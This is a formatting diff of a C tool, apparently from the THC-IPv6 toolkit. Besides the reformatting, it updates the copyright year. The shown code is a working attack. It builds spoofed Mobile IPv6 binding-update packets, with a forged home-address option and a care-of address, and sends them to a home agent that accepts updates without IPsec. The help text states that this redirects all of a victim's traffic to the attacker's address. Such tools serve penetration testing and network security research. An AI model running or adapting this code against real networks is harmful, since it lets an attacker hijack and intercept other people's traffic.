@@ -11,27 +11,33 @@
 #include "thc-ipv6.h"
 
 unsigned char buf[64];
-int buf_len = 0;
+int           buf_len = 0;
 
 void help(char *prg) {
-  printf("%s %s (c) 2019 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
-  printf("Syntax: %s interface home-address home-agent-address care-of-address\n\n", prg);
-  printf("If the mobile IPv6 home-agent is mis-configured to accept MIPV6 updates without\n");
-  printf("IPSEC, this will redirect all packets for home-address to care-of-address\n");
-//  printf("Use -r to use raw mode.\n\n");
+  printf("%s %s (c) 2020 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf(
+      "Syntax: %s interface home-address home-agent-address "
+      "care-of-address\n\n",
+      prg);
+  printf(
+      "If the mobile IPv6 home-agent is mis-configured to accept MIPV6 updates "
+      "without\n");
+  printf(
+      "IPSEC, this will redirect all packets for home-address to "
+      "care-of-address\n");
+  //  printf("Use -r to use raw mode.\n\n");
   exit(-1);
 }
 
 int main(int argc, char *argv[]) {
   unsigned char *pkt1 = NULL;
   unsigned char *h = NULL, *ha = NULL, *coa = NULL, *mac = NULL;
-  int pkt1_len = 0, rawmode = 0;
-  unsigned int id = 2, i;
-  char *interface;
-  thc_ipv6_hdr *hdr;
+  int            pkt1_len = 0, rawmode = 0;
+  unsigned int   id = 2, i;
+  char *         interface;
+  thc_ipv6_hdr * hdr;
 
-  if (argc < 4 || strncmp(argv[1], "-h", 2) == 0)
-    help(argv[0]);
+  if (argc < 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]);
 
   if (strcmp(argv[1], "-r") == 0) {
     thc_ipv6_rawmode(1);
@@ -49,7 +55,7 @@ int main(int argc, char *argv[]) {
     fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
     exit(-1);
   }
-  
+
   if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
     fprintf(stderr, "Error: invalid interface %s\n", interface);
     exit(-1);
@@ -64,12 +70,12 @@ int main(int argc, char *argv[]) {
     memcpy(&buf[6], h, 16);
     buf_len = 22;
 
-    if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, coa, ha, 64, 0, 0, 0, 0)) == NULL)
+    if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len,
+                                         coa, ha, 64, 0, 0, 0, 0)) == NULL)
       return -1;
-    hdr = (thc_ipv6_hdr *) pkt1;
+    hdr = (thc_ipv6_hdr *)pkt1;
     hdr->original_src = h;
-    if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, buf_len) < 0)
-      return -1;
+    if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, buf_len) < 0) return -1;
     memset(buf, 0, sizeof(buf));
     buf[0] = 59;
     buf[1] = 3;
@@ -85,8 +91,7 @@ int main(int argc, char *argv[]) {
     buf[15] = 16;
     memcpy(&buf[16], coa, 16);
     buf_len = 32;
-    if (thc_add_data6(pkt1, &pkt1_len, NXT_MIPV6, buf, buf_len) < 0)
-      return -1;
+    if (thc_add_data6(pkt1, &pkt1_len, NXT_MIPV6, buf, buf_len) < 0) return -1;
 
     thc_generate_and_send_pkt(interface, NULL, mac, pkt1, &pkt1_len);
 
